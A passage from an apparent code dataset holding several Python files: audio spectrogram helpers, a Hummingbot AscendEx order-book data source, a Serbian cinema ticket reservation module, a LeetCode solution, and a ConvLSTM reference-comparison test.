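The amplitude_to_db / db_to_amplitude pair above only inverts cleanly when power_exp matches the stype used on the way in. A small round-trip check for the power case, assuming torchaudio is installed (with AmplitudeToDB's default top_db=None, nothing is clamped):

# Round trip: power spectrogram -> dB -> power spectrogram.
import torch
import torchaudio

spec = torch.rand(1, 257, 100) + 1e-6          # stand-in power spectrogram
to_db = torchaudio.transforms.AmplitudeToDB(stype="power")
db = to_db(spec)
back = torchaudio.functional.DB_to_amplitude(db, ref=1.0, power=1.0)
print(torch.allclose(spec, back, atol=1e-4))   # True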
Shape: [B, FREQ, FRAMES].\n hp (HParams): parameters.\n \"\"\"\n assert len(spectrogram.size()) == 3, \\\n \"Dimensions of spectogram should be 3, found {}\".format(len(spectrogram.size()))\n\n n_spectrograms = spectrogram.shape[0]\n # In case the spectrogram tensor is in the GPU\n spectrogram = spectrogram.detach().to('cpu')\n fig = plt.figure()\n for i in range(0, n_spectrograms):\n fig.add_subplot(n_spectrograms, 1, i + 1)\n plt.imshow(spectrogram[i].detach().to('cpu'), origin='lower', interpolation=\"none\")\n plt.axis('off')\n\n fig.savefig(fname=filepath)\n\n\ndef save_wave(filepath: str, waveform: Tensor, hp: HParams) -> None:\n r\"\"\"Wrapper around torchaudio.save().\n\n Args:\n filepath (str): path where the audio will be saved.\n waveform (Tensor): audio waveform to be saved. Shape: [1, L] where L is the number\n of times the waveform has been sampled.\n hp (HParams): parameters. Parameters needed are sample_rate.\n \"\"\"\n # In case the waveform is in the GPU\n waveform = waveform.detach().to('cpu')\n torchaudio.save(filepath, waveform, hp.audio.sample_rate)\n","sub_path":"src/dataprocessing/transforms.py","file_name":"transforms.py","file_ext":"py","file_size_in_byte":13863,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"486829953","text":"#!/usr/bin/env python\nimport asyncio\nimport logging\nimport time\nfrom collections import defaultdict\nfrom typing import Any, Dict, List, Mapping, Optional\n\nimport aiohttp\nimport pandas as pd\nfrom bidict import bidict\n\nfrom hummingbot.connector.exchange.ascend_ex import ascend_ex_constants as CONSTANTS\nfrom hummingbot.connector.exchange.ascend_ex.ascend_ex_order_book import AscendExOrderBook\nfrom hummingbot.connector.exchange.ascend_ex.ascend_ex_utils import build_api_factory, get_hb_id_headers\nfrom hummingbot.core.api_throttler.async_throttler import AsyncThrottler\nfrom hummingbot.core.data_type.order_book import OrderBook\nfrom hummingbot.core.data_type.order_book_message import OrderBookMessage\nfrom hummingbot.core.data_type.order_book_tracker_data_source import OrderBookTrackerDataSource\nfrom hummingbot.core.web_assistant.connections.data_types import RESTMethod, RESTRequest, RESTResponse, WSRequest\nfrom hummingbot.core.web_assistant.web_assistants_factory import WebAssistantsFactory\nfrom hummingbot.core.web_assistant.ws_assistant import WSAssistant\nfrom hummingbot.logger import HummingbotLogger\n\n\nclass AscendExAPIOrderBookDataSource(OrderBookTrackerDataSource):\n MAX_RETRIES = 20\n MESSAGE_TIMEOUT = 30.0\n SNAPSHOT_TIMEOUT = 10.0\n PING_TIMEOUT = 15.0\n HEARTBEAT_PING_INTERVAL = 15.0\n\n TRADE_TOPIC_ID = \"trades\"\n DIFF_TOPIC_ID = \"depth\"\n PING_TOPIC_ID = \"ping\"\n\n _logger: Optional[HummingbotLogger] = None\n _trading_pair_symbol_map: Mapping[str, str] = None\n _mapping_initialization_lock = asyncio.Lock()\n\n @classmethod\n def logger(cls) -> HummingbotLogger:\n if cls._logger is None:\n cls._logger = logging.getLogger(__name__)\n return cls._logger\n\n def __init__(self,\n api_factory: Optional[WebAssistantsFactory] = None,\n throttler: Optional[AsyncThrottler] = None,\n trading_pairs: List[str] = None):\n super().__init__(trading_pairs)\n self._api_factory = api_factory or build_api_factory()\n self._throttler = throttler or self._get_throttler_instance()\n self._trading_pairs: List[str] = trading_pairs\n\n self._message_queue: Dict[str, asyncio.Queue] = defaultdict(asyncio.Queue)\n\n @classmethod\n async def get_last_traded_prices(\n cls,\n 
trading_pairs: List[str],\n api_factory: Optional[WebAssistantsFactory] = None,\n throttler: Optional[AsyncThrottler] = None\n ) -> Dict[str, float]:\n \"\"\"\n Return a dictionary the trading_pair as key and the current price as value for each trading pair passed as\n parameter\n\n :param trading_pairs: list of trading pairs to get the prices for\n :param api_factory: the instance of the web assistant factory to be used when doing requests to the server.\n If no instance is provided then a new one will be created.\n :param throttler: the instance of the throttler to use to limit request to the server. If it is not specified\n the function will create a new one.\n\n :return: Dictionary of associations between token pair and its latest price\n \"\"\"\n result = {}\n\n for trading_pair in trading_pairs:\n api_factory = api_factory or build_api_factory()\n throttler = throttler or cls._get_throttler_instance()\n rest_assistant = await api_factory.get_rest_assistant()\n\n url = f\"{CONSTANTS.REST_URL}/{CONSTANTS.TRADES_PATH_URL}\"\\\n f\"?symbol={await AscendExAPIOrderBookDataSource.exchange_symbol_associated_to_pair(trading_pair)}\"\n request = RESTRequest(method=RESTMethod.GET, url=url)\n\n async with throttler.execute_task(CONSTANTS.TRADES_PATH_URL):\n resp: RESTResponse = await rest_assistant.call(request=request)\n if resp.status != 200:\n raise IOError(\n f\"Error fetching last traded prices at {CONSTANTS.EXCHANGE_NAME}. \"\n f\"HTTP status is {resp.status}.\"\n )\n\n resp_json = await resp.json()\n if resp_json.get(\"code\") != 0:\n raise IOError(\n f\"Error fetching last traded prices at {CONSTANTS.EXCHANGE_NAME}. \"\n f\"Error is {resp_json.message}.\"\n )\n\n trades = resp_json.get(\"data\").get(\"data\")\n\n # last trade is the most recent trade\n for trade in trades[-1:]:\n result[trading_pair] = float(trade.get(\"p\"))\n\n return result\n\n @staticmethod\n async def get_order_book_data(trading_pair: str,\n api_factory: Optional[WebAssistantsFactory] = None,\n throttler: Optional[AsyncThrottler] = None) -> Dict[str, any]:\n \"\"\"\n Get whole orderbook\n\n :param trading_pair: a trading pair for which the order book should be retrieved\n :param api_factory: the instance of the web assistant factory to be used when doing requests to the server.\n If no instance is provided then a new one will be created.\n :param throttler: the instance of the throttler to use to limit request to the server. If it is not specified\n the function will create a new one.\n\n :return: current order book for the specified trading pair\n \"\"\"\n api_factory = api_factory or build_api_factory()\n throttler = throttler or AscendExAPIOrderBookDataSource._get_throttler_instance()\n rest_assistant = await api_factory.get_rest_assistant()\n\n url = f\"{CONSTANTS.REST_URL}/{CONSTANTS.DEPTH_PATH_URL}\"\\\n f\"?symbol={await AscendExAPIOrderBookDataSource.exchange_symbol_associated_to_pair(trading_pair)}\"\n request = RESTRequest(method=RESTMethod.GET, url=url)\n\n async with throttler.execute_task(CONSTANTS.DEPTH_PATH_URL):\n resp: RESTResponse = await rest_assistant.call(request=request)\n if resp.status != 200:\n raise IOError(\n f\"Error fetching OrderBook for {trading_pair} at {CONSTANTS.EXCHANGE_NAME}. \"\n f\"HTTP status is {resp.status}.\"\n )\n\n data: Dict[str, Any] = await resp.json()\n if data.get(\"code\") != 0:\n raise IOError(\n f\"Error fetching OrderBook for {trading_pair} at {CONSTANTS.EXCHANGE_NAME}. 
\"\n f\"Error is {data['reason']}.\"\n )\n\n return data[\"data\"]\n\n @classmethod\n def trading_pair_symbol_map_ready(cls):\n \"\"\"\n Checks if the mapping from exchange symbols to client trading pairs has been initialized\n\n :return: True if the mapping has been initialized, False otherwise\n \"\"\"\n return cls._trading_pair_symbol_map is not None and len(cls._trading_pair_symbol_map) > 0\n\n @classmethod\n async def trading_pair_symbol_map(\n cls,\n api_factory: Optional[WebAssistantsFactory] = None,\n throttler: Optional[AsyncThrottler] = None\n ):\n \"\"\"\n Returns the internal map used to translate trading pairs from and to the exchange notation.\n In general this should not be used. Instead call the methods `exchange_symbol_associated_to_pair` and\n `trading_pair_associated_to_exchange_symbol`\n\n :param api_factory: the web assistant factory to use in case the symbols information has to be requested\n :param throttler: the throttler instance to use in case the symbols information has to be requested\n\n :return: bidirectional mapping between trading pair exchange notation and client notation\n \"\"\"\n if not cls.trading_pair_symbol_map_ready():\n async with cls._mapping_initialization_lock:\n # Check condition again (could have been initialized while waiting for the lock to be released)\n if not cls.trading_pair_symbol_map_ready():\n await cls._init_trading_pair_symbols(api_factory, throttler)\n\n return cls._trading_pair_symbol_map\n\n @staticmethod\n async def exchange_symbol_associated_to_pair(\n trading_pair: str,\n api_factory: Optional[WebAssistantsFactory] = None,\n throttler: Optional[AsyncThrottler] = None,\n ) -> str:\n \"\"\"\n Used to translate a trading pair from the client notation to the exchange notation\n\n :param trading_pair: trading pair in client notation\n :param api_factory: the web assistant factory to use in case the symbols information has to be requested\n :param throttler: the throttler instance to use in case the symbols information has to be requested\n\n :return: trading pair in exchange notation\n \"\"\"\n symbol_map = await AscendExAPIOrderBookDataSource.trading_pair_symbol_map(\n api_factory=api_factory,\n throttler=throttler)\n return symbol_map.inverse[trading_pair]\n\n @staticmethod\n async def trading_pair_associated_to_exchange_symbol(\n symbol: str,\n api_factory: Optional[WebAssistantsFactory] = None,\n throttler: Optional[AsyncThrottler] = None) -> str:\n \"\"\"\n Used to translate a trading pair from the exchange notation to the client notation\n\n :param symbol: trading pair in exchange notation\n :param api_factory: the web assistant factory to use in case the symbols information has to be requested\n :param throttler: the throttler instance to use in case the symbols information has to be requested\n\n :return: trading pair in client notation\n \"\"\"\n symbol_map = await AscendExAPIOrderBookDataSource.trading_pair_symbol_map(\n api_factory=api_factory,\n throttler=throttler)\n return symbol_map[symbol]\n\n @staticmethod\n async def fetch_trading_pairs() -> List[str]:\n \"\"\"\n Returns a list of all known trading pairs enabled to operate with\n\n :return: list of trading pairs in client notation\n \"\"\"\n mapping = await AscendExAPIOrderBookDataSource.trading_pair_symbol_map()\n return list(mapping.values())\n\n async def get_new_order_book(self, trading_pair: str) -> OrderBook:\n \"\"\"\n Creates a local instance of the exchange order book for a particular trading pair\n\n :param trading_pair: the trading pair for which the 
order book has to be retrieved\n\n :return: a local copy of the current order book in the exchange\n \"\"\"\n snapshot: Dict[str, Any] = await self.get_order_book_data(trading_pair,\n api_factory=self._api_factory,\n throttler=self._throttler)\n snapshot_timestamp: float = snapshot.get(\"data\").get(\"ts\")\n snapshot_msg: OrderBookMessage = AscendExOrderBook.snapshot_message_from_exchange(\n snapshot.get(\"data\"),\n snapshot_timestamp,\n metadata={\"trading_pair\": trading_pair}\n )\n order_book = self.order_book_create_function()\n order_book.apply_snapshot(snapshot_msg.bids, snapshot_msg.asks, snapshot_msg.update_id)\n return order_book\n\n async def listen_for_subscriptions(self):\n \"\"\"\n Connects to the trade events and order diffs websocket endpoints and listens to the messages sent by the\n exchange. Each message is stored in its own queue.\n \"\"\"\n ws = None\n while True:\n try:\n ws = await self._subscribe_to_order_book_streams()\n async for ws_response in ws.iter_messages():\n data = ws_response.data\n if \"result\" in data:\n continue\n event_type = data.get(\"m\")\n if event_type in [self.TRADE_TOPIC_ID, self.DIFF_TOPIC_ID]:\n self._message_queue[event_type].put_nowait(data)\n if event_type in [self.PING_TOPIC_ID]:\n await self._handle_ping_message(ws)\n except asyncio.CancelledError:\n raise\n except Exception:\n self.logger().error(\"Unexpected error occurred when listening to order book streams. \"\n \"Retrying in 5 seconds...\",\n exc_info=True)\n await self._sleep(5.0)\n finally:\n ws and await ws.disconnect()\n\n async def listen_for_trades(self, ev_loop: asyncio.BaseEventLoop, output: asyncio.Queue):\n \"\"\"\n Reads the trade events queue. For each event creates a trade message instance and adds it to the output queue\n\n :param ev_loop: the event loop the method will run in\n :param output: a queue to add the created trade messages\n \"\"\"\n msg_queue = self._message_queue[self.TRADE_TOPIC_ID]\n while True:\n try:\n msg = await msg_queue.get()\n trading_pair = \\\n await AscendExAPIOrderBookDataSource.trading_pair_associated_to_exchange_symbol(msg.get(\"symbol\"))\n trades = msg.get(\"data\")\n\n for trade in trades:\n trade_timestamp: int = trade.get(\"ts\")\n trade_msg: OrderBookMessage = AscendExOrderBook.trade_message_from_exchange(\n trade,\n trade_timestamp,\n metadata={\"trading_pair\": trading_pair}\n )\n output.put_nowait(trade_msg)\n except asyncio.CancelledError:\n raise\n except Exception:\n self.logger().error(\"Unexpected error with WebSocket connection. Retrying after 30 seconds...\",\n exc_info=True)\n\n async def listen_for_order_book_diffs(self, ev_loop: asyncio.BaseEventLoop, output: asyncio.Queue):\n \"\"\"\n Reads the order diffs events queue. 
For each event creates a diff message instance and adds it to the\n output queue\n\n :param ev_loop: the event loop the method will run in\n :param output: a queue to add the created diff messages\n \"\"\"\n msg_queue = self._message_queue[self.DIFF_TOPIC_ID]\n while True:\n try:\n msg = await msg_queue.get()\n msg_timestamp: int = msg.get(\"data\").get(\"ts\")\n trading_pair = \\\n await AscendExAPIOrderBookDataSource.trading_pair_associated_to_exchange_symbol(msg.get(\"symbol\"))\n order_book_message: OrderBookMessage = AscendExOrderBook.diff_message_from_exchange(\n msg.get(\"data\"),\n msg_timestamp,\n metadata={\"trading_pair\": trading_pair}\n )\n output.put_nowait(order_book_message)\n except asyncio.CancelledError:\n raise\n except Exception as e:\n self.logger().debug(str(e))\n self.logger().error(\"Unexpected error with WebSocket connection. Retrying after 30 seconds...\",\n exc_info=True)\n await self._sleep(30.0)\n\n async def listen_for_order_book_snapshots(self, ev_loop: asyncio.BaseEventLoop, output: asyncio.Queue):\n \"\"\"\n This method runs continuously and request the full order book content from the exchange every hour.\n The method uses the REST API from the exchange because it does not provide an endpoint to get the full order\n book through websocket. With the information creates a snapshot messages that is added to the output queue\n\n :param ev_loop: the event loop the method will run in\n :param output: a queue to add the created snapshot messages\n \"\"\"\n while True:\n try:\n for trading_pair in self._trading_pairs:\n try:\n snapshot: Dict[str, any] = await self.get_order_book_data(trading_pair,\n api_factory=self._api_factory,\n throttler=self._throttler)\n snapshot_timestamp: float = snapshot.get(\"data\").get(\"ts\")\n snapshot_msg: OrderBookMessage = AscendExOrderBook.snapshot_message_from_exchange(\n snapshot.get(\"data\"),\n snapshot_timestamp,\n metadata={\"trading_pair\": trading_pair}\n )\n output.put_nowait(snapshot_msg)\n self.logger().debug(f\"Saved order book snapshot for {trading_pair}\")\n # Be careful not to go above API rate limits.\n await self._sleep(5.0)\n except asyncio.CancelledError:\n raise\n except Exception:\n self.logger().network(\n \"Unexpected error with WebSocket connection.\",\n exc_info=True,\n app_warning_msg=\"Unexpected error with WebSocket connection. Retrying in 5 seconds. 
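listen_for_subscriptions above routes every websocket payload into a per-topic asyncio.Queue that listen_for_trades and listen_for_order_book_diffs then drain. A generic, self-contained sketch of that fan-out pattern (no exchange connectivity involved):

# One producer routes messages into per-topic queues; one consumer per topic
# drains its own queue, mirroring the message flow above.
import asyncio
from collections import defaultdict

async def producer(queues):
    for i in range(6):
        topic = "trades" if i % 2 == 0 else "depth"
        queues[topic].put_nowait({"m": topic, "n": i})
    await asyncio.sleep(0)

async def consumer(name, queue, count):
    for _ in range(count):
        msg = await queue.get()
        print(name, msg)

async def main():
    queues = defaultdict(asyncio.Queue)
    await producer(queues)
    await asyncio.gather(consumer("trades", queues["trades"], 3),
                         consumer("depth", queues["depth"], 3))

asyncio.run(main())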
\"\n \"Check network connection.\"\n )\n await self._sleep(5.0)\n this_hour: pd.Timestamp = pd.Timestamp.utcnow().replace(minute=0, second=0, microsecond=0)\n next_hour: pd.Timestamp = this_hour + pd.Timedelta(hours=1)\n delta: float = next_hour.timestamp() - time.time()\n await self._sleep(delta)\n except asyncio.CancelledError:\n raise\n except Exception:\n self.logger().error(\"Unexpected error.\", exc_info=True)\n await self._sleep(5.0)\n\n @classmethod\n def _get_throttler_instance(cls) -> AsyncThrottler:\n throttler = AsyncThrottler(CONSTANTS.RATE_LIMITS)\n return throttler\n\n @classmethod\n async def _init_trading_pair_symbols(\n cls,\n api_factory: Optional[WebAssistantsFactory] = None,\n throttler: Optional[AsyncThrottler] = None):\n \"\"\"\n Initialize mapping of trade symbols in exchange notation to trade symbols in client notation\n \"\"\"\n mapping = bidict()\n\n api_factory = api_factory or build_api_factory()\n rest_assistant = await api_factory.get_rest_assistant()\n throttler = throttler or cls._get_throttler_instance()\n\n url = f\"{CONSTANTS.REST_URL}/{CONSTANTS.PRODUCTS_PATH_URL}\"\n request = RESTRequest(method=RESTMethod.GET, url=url)\n\n try:\n async with throttler.execute_task(limit_id=CONSTANTS.PRODUCTS_PATH_URL):\n response: RESTResponse = await rest_assistant.call(request=request)\n if response.status == 200:\n data: Dict[str, Dict[str, Any]] = await response.json()\n for symbol_data in data[\"data\"]:\n mapping[symbol_data[\"symbol\"]] = f\"{symbol_data['baseAsset']}-{symbol_data['quoteAsset']}\"\n except Exception as ex:\n cls.logger().error(f\"There was an error requesting exchange info ({str(ex)})\")\n\n cls._trading_pair_symbol_map = mapping\n\n async def _subscribe_to_order_book_streams(self) -> aiohttp.ClientWebSocketResponse:\n \"\"\"\n Subscribes to the order book diff orders events through the provided websocket connection.\n \"\"\"\n try:\n trading_pairs = \",\".join([\n await AscendExAPIOrderBookDataSource.exchange_symbol_associated_to_pair(trading_pair)\n for trading_pair in self._trading_pairs\n ])\n subscription_payloads = [\n {\n \"op\": CONSTANTS.SUB_ENDPOINT_NAME,\n \"ch\": f\"{topic}:{trading_pairs}\"\n }\n for topic in [self.DIFF_TOPIC_ID, self.TRADE_TOPIC_ID]\n ]\n\n ws: WSAssistant = await self._api_factory.get_ws_assistant()\n url = CONSTANTS.WS_URL\n headers = get_hb_id_headers()\n await ws.connect(ws_url=url, ws_headers=headers, ping_timeout=self.HEARTBEAT_PING_INTERVAL)\n\n for payload in subscription_payloads:\n subscribe_request: WSRequest = WSRequest(payload)\n async with self._throttler.execute_task(CONSTANTS.SUB_ENDPOINT_NAME):\n await ws.send(subscribe_request)\n\n self.logger().info(f\"Subscribed to {self._trading_pairs} orderbook trading and delta streams...\")\n\n return ws\n except asyncio.CancelledError:\n raise\n except Exception:\n self.logger().error(\"Unexpected error occurred subscribing to order book trading and delta streams...\")\n raise\n\n async def _handle_ping_message(self, ws: aiohttp.ClientWebSocketResponse):\n \"\"\"\n Responds with pong to a ping message send by a server to keep a websocket connection alive\n \"\"\"\n async with self._throttler.execute_task(CONSTANTS.PONG_ENDPOINT_NAME):\n payload = {\n \"op\": \"pong\"\n }\n pong_request: WSRequest = WSRequest(payload)\n await 
ws.send(pong_request)\n","sub_path":"hummingbot/connector/exchange/ascend_ex/ascend_ex_api_order_book_data_source.py","file_name":"ascend_ex_api_order_book_data_source.py","file_ext":"py","file_size_in_byte":21455,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"107733455","text":"import os\nimport Data_Functions\nimport Movies_Functions\nfrom time import gmtime, strftime\nfrom Data_Functions import istampajSlobodnaMesta\nfrom Movies_Functions import ispisProjekcija, ispisFilmova\n\ndef rezKarataMeni(slobodnaSedista, projekcije, ulogovan, karte):\n os.system('cls')\n while True:\n ispisProjekcija(projekcije)\n sifra = input(\"Uneiste sifru projekcije:\")\n\n istampajSlobodnaMesta(slobodnaSedista)\n\n dan = input(\"Unesite dan\")\n\n unosSediste = input(\"Unesite sediste: \")\n rezervacija = rezervisiSediste(unosSediste, sifra, dan)\n\n if rezervacija == True:\n print(\"Uspesno ste rezervisali kartu\")\n karta = {}\n karta[\"imePrezime\"] = str(ulogovan[\"ime\"] + ulogovan[\"prezime\"])\n karta[\"kIme\"] = ulogovan[\"korisnickoIme\"]\n karta[\"oznakaSedista\"] = unosSediste\n karta[\"datumProdaje\"] = strftime(\"%d-%m-%Y\", gmtime())\n karta[\"rezIliKupljena\"] = \"Rezervisana\"\n for projekcija in projekcije:\n if projekcija[\"sifra\"] == sifra:\n karta[\"termin\"] = str(projekcija[\"vremePocetka\"] + \"-\" + projekcija[\"vremeKraja\"])\n\n karte.append(karta)\n\n while True:\n print(\"Da li zelite da rezervisete jos jednu?\")\n print(\" 1 - Da\")\n print(\" 2 - Nazad\")\n unos = input(\"Unesite opciju:\")\n if unos == 1:\n break\n elif unos == 2:\n return\n else:\n print(\"Pogresan unos.Pokusajte ponovo \")\n\n\n continue\n else:\n os.system('cls')\n print(\"Mesto koje ste probali da zauzmete je zauzeto. Porobajte ponovo.\")\n continue\n\n\n\ndef pregledKarataKupac(karte,ulogovan):\n nasao = 0\n for karta in karte:\n if ulogovan[\"korisnickoIme\"] == karta[\"kIme\"] and karta[\"rezIliKupljena\"] == \"Rezervisana\":\n print(Data_Functions.formatirajKarte(karta))\n nasao = 1\n if nasao == 0:\n print(\"Ne postoji karta na vasem imenu.\")\n\n\n\n return nasao\n\ndef pregledKarataProdavac(karte):\n\n for karta in karte:\n print(Data_Functions.formatirajKarte(karta))\n\n return\n\ndef otkaziRezKarteKupac(karte,ulogovan):\n i=0\n j=-1\n index = 0\n nasao = 0\n for karta in karte:\n if ulogovan[\"korisnickoIme\"] == karta[\"kIme\"] and karta[\"rezIliKupljena\"] == \"Rezervisana\":\n nasao = 1\n\n if nasao == 0:\n print(\"Ne postoji karta na vasem imenu. \")\n input(\"Pritisnite Enter za dalje\")\n return karte\n\n print(\"Izaberite kartu koju zelite da ponistite:\")\n for karta in karte:\n if ulogovan[\"korisnickoIme\"] == karta[\"kIme\"] and karta[\"rezIliKupljena\"] == \"Rezervisana\":\n print(str(i) + \" - \" + Data_Functions.formatirajKarte(karta))\n i= i + 1\n izbor = input(\"\")\n\n for karta in karte:\n j+=1\n if ulogovan[\"korisnickoIme\"] == karta[\"kIme\"] and karta[\"rezIliKupljena\"] == \"Rezervisana\":\n i+=1\n if i== izbor:\n index = j\n break\n if j== -1:\n print(\"Pogresan unos karte.\")\n input(\"Enter\")\n return karte\n else:\n karte.pop(index)\n\n return karte\n\ndef otkaziRezKarteProdavac(karte):\n nasao = 0\n i=0\n j=0\n index = -1\n for karta in karte:\n if karta[\"rezIliKupljena\"] == \"Rezervisana\":\n nasao = 1\n\n if nasao == 0:\n print(\"Ne postoji karta na vasem imenu. 
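_init_trading_pair_symbols above stores the symbol map in a bidict so that both lookup directions used by exchange_symbol_associated_to_pair (via .inverse) and trading_pair_associated_to_exchange_symbol are O(1) on one shared structure. A tiny sketch with hypothetical symbols:

# bidict gives forward and inverse views over the same mapping.
from bidict import bidict

mapping = bidict({"ASD/USDT": "ASD-USDT", "BTC/USDT": "BTC-USDT"})  # hypothetical
print(mapping["ASD/USDT"])          # ASD-USDT: exchange symbol -> trading pair
print(mapping.inverse["BTC-USDT"])  # BTC/USDT: trading pair -> exchange symbol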
\")\n input(\"Pritisnite Enter za dalje\")\n return karte\n\n print(\"Izaberite kartu koju zelite da ponistite:\")\n for karta in karte:\n if karta[\"rezIliKupljena\"] == \"Rezervisana\":\n print(str(i) + \" - \" + Data_Functions.formatirajKarte(karta))\n i = i + 1\n izbor = input(\"\")\n\n for karta in karte:\n j += 1\n if karta[\"rezIliKupljena\"] == \"Rezervisana\":\n i += 1\n if i == izbor:\n index = j\n break\n if j == -1:\n print(\"Pogresan unos karte.\")\n input(\"Enter\")\n return karte\n else:\n karte.pop(index)\n\n return karte\n\ndef rezervisiSediste(unosSediste, sifra, dan):\n global slobodnaSedista\n\n for sediste in slobodnaSedista:\n if sediste[\"sifra\"] == str(sifra + dan):\n if(sediste[\"ukupnoPraznih\"] == 0):\n return False\n else:\n i = int(unosSediste[0])\n j = ord(unosSediste[1]) - 65\n if sediste[\"matrica\"][i * sediste[\"kolona\"] + j] == 1:\n return False\n else:\n sediste[\"matrica\"][i * sediste[\"kolona\"] + j] = 1\n sediste[\"ukupnoPraznih\"]-=1\n return True\n return False\n\ndef pretragaKarataMeni(karte,projekcije):\n\n os.system(\"cls\")\n print(\"Izaberite po cemu zelite da pretrazujete.\")\n print(\" 1 - Sifri projekcije\")\n print(\" 2 - Imenu\")\n print(\" 3 - Prezimenu \")\n print(\" 4 - Korisnickom imenu\")\n print(\" 5 - Vremenu pocetka/kraja\")\n print(\" 6 - Datumu\")\n print(\" 7 - Po stanju (rezervisana ili kupljena\")\n izbor =input (\" Unesite opciju:\")\n os.system(\"cls\")\n if izbor == \"1\":\n Movies_Functions.ispisProjekcija(projekcije)\n sifra =input(\"Unesite sifru projekcije: \")\n termin = \"\"\n for projekcija in projekcije:\n if projekcija[\"sifra\"] == sifra:\n termin = str(projekcija[\"vremePocetka\"]) +\"-\" + (projekcija[\"vremeKraja\"])\n\n rez = Data_Functions.pretragaPoStringVrednosti(karte, \"termin\", termin)\n print(ispisKarata(rez))\n\n elif izbor == \"2\":\n ime = input(\"Unesite ime:\")\n pretrazenaLista = Data_Functions.pretragaPoStringVrednosti(karte,\"imePrezime\",ime)\n print(ispisKarata(pretrazenaLista))\n\n elif izbor == \"3\":\n prezime = input(\"Unesite prezime:\")\n pretrazenaLista = Data_Functions.pretragaPoStringVrednosti(karte,\"imePrezime\",prezime)\n print(ispisKarata(pretrazenaLista))\n elif izbor == \"4\":\n username = input(\"Unesite korisnicko ime:\")\n pretrazenaLista = Data_Functions.pretragaPoStringVrednosti(karte, \"kIme\", username)\n print(ispisKarata(pretrazenaLista))\n elif izbor == \"5\":\n vreme = input(\"Unesite vreme\")\n rez = Data_Functions.pretragaPoStringVrednosti(karte, \"termin\", vreme)\n print(ispisKarata(rez))\n elif izbor == \"6\":\n datum = input(\"Unesite datum\")\n rez = Data_Functions.pretragaPoStringVrednosti(karte, \"datumProdaje\", datum)\n print(ispisKarata(rez))\n elif izbor == \"7\":\n stanje = input(\"Unesite stanje karte(Rezervisana/Kupljena)\")\n rez = Data_Functions.pretragaPoStringVrednosti(karte, \"rezIliKupljena\", stanje)\n print(ispisKarata(rez))\n else:\n return\n\n\n return\n\ndef prodajaRezervisaneKarte(karte):\n\n i= 0\n j=0\n print(\"Izaberite kartu koju zelite da prodate:\")\n for karta in karte:\n j = j + 1\n if karta[\"rezIliKupljena\"] == \"Rezervisana\":\n print(str(i) + \" - \" + Data_Functions.formatirajKarte(karta))\n i = i + 1\n izbor = int(input(\"\"))\n\n\n pomocna = {}\n indeks = 0\n j = 0\n i = 0\n for karta in karte:\n j = j + 1\n if karta[\"rezIliKupljena\"] == \"Rezervisana\":\n if i == izbor:\n pomocna[\"imePrezime\"] = karta[\"imePrezime\"]\n pomocna[\"kIme\"] = karta[\"kIme\"]\n pomocna[\"termin\"] = karta[\"termin\"]\n 
pomocna[\"oznakaSedista\"] = karta[\"oznakaSedista\"]\n pomocna[\"datumProdaje\"] = karta[\"datumProdaje\"]\n pomocna[\"rezIliKupljena\"] = \"Kupljena\"\n karte[j][\"rezIliKupljena\"] = \"Kupljena\"\n indeks = j\n i += 1\n\n return karte\n\ndef ispisKarata(karte):\n str = \"\"\n\n for karta in karte:\n str += \"|{0:15}|{1:15}|{2:15}|{3:15}|{4:15}|{5:15}|\".format(karta[\"imePrezime\"],\n karta[\"kIme\"],\n karta[\"termin\"],\n karta[\"oznakaSedista\"],\n karta[\"datumProdaje\"],\n karta[\"rezIliKupljena\"])\n str += \"\\n\"\n print(str)\n print(\"\\n\\n Klikni enter za dalje\")\n input(\"\")\n\n return\n\n\ndef ispisTermina(termini):\n str = \"\"\n\n\n for termin in termini:\n str += \"|{0:15}|{1:15}|\".format(termin[\"sifra\"], termin[\"datum\"])\n\n str += \"\\n\"\n\n print(str)\n print(\"\\n\\n Klikni enter za dalje\")\n input(\"\")\n\n return","sub_path":"ProjekatOP/Tickets_Functions.py","file_name":"Tickets_Functions.py","file_ext":"py","file_size_in_byte":8814,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"349307201","text":"# import Integer\nclass Solution:\n def integerReplacement(self, n):\n \"\"\"\n :type n: int\n :rtype: int\n \"\"\"\n count = 0\n c = bin(int(n))[2:]\n while True:\n if c == '1':\n return count\n if c == '11':\n return count + 2\n if c[-1] == '0':\n c = c[:-1]\n elif c[-1] == c[-2] == '1':\n c = bin(int(c, 2) + 1)[2:]\n elif c[-1] == '1' and c [-2] == '0':\n c = bin(int(c, 2) - 1)[2:]\n count += 1\n\nprint(Solution.integerReplacement(Solution(), 3))","sub_path":"lt/lt397.py","file_name":"lt397.py","file_ext":"py","file_size_in_byte":618,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"592428696","text":"from copy import deepcopy\nimport sys, os\n\nimport torch\nimport numpy as np\n\nfrom vp_suite.models import EF_ConvLSTM as OurEF_ConvLSTM\nfrom vp_suite.utils.models import state_dicts_equal\n\nREFERENCE_GIT_URL = \"https://github.com/Hzzone/Precipitation-Nowcasting.git\"\nREPO_DIR = \"Precipitation-Nowcasting\"\n\n\n# noinspection PyUnresolvedReferences\ndef test_impl():\n # cfg needs to be imported due to circular import in their code, however it is not loadable by default due to\n # faulty assertion statements -> Remove 'assert' statements from config file so that it actually gets loaded.\n cfg_module_fp = os.path.join(sys.path[0], \"nowcasting/config.py\")\n with open(cfg_module_fp, 'r') as cfg_module_file:\n lines = cfg_module_file.readlines()\n with open(cfg_module_fp, 'w') as cfg_module_file:\n for line in lines:\n if \"assert\" not in line:\n cfg_module_file.write(line)\n\n from nowcasting.config import cfg\n from unittest.mock import Mock\n sys.modules[\"pandas\"] = Mock()\n sys.modules[\"nowcasting.hko.evaluation\"] = Mock()\n sys.modules[\"nowcasting.train_and_test\"] = Mock()\n from nowcasting.models.forecaster import Forecaster\n from nowcasting.models.encoder import Encoder\n from nowcasting.models.model import EF as TheirEF\n from experiments.net_params import encoder_params, forecaster_params, \\\n convlstm_encoder_params, convlstm_forecaster_params\n\n device = \"cuda\" if torch.cuda.is_available() else \"cpu\"\n batch_size = 1\n context_frames, pred_frames = 5, 20 # default values for their EF model\n c, h, w = 1, 480, 480 # their default EF model takes in images of shape (1, 480, 480)\n\n # set up original models\n print(\"setting up their model\")\n their_convlstm_encoder = Encoder(convlstm_encoder_params[0], 
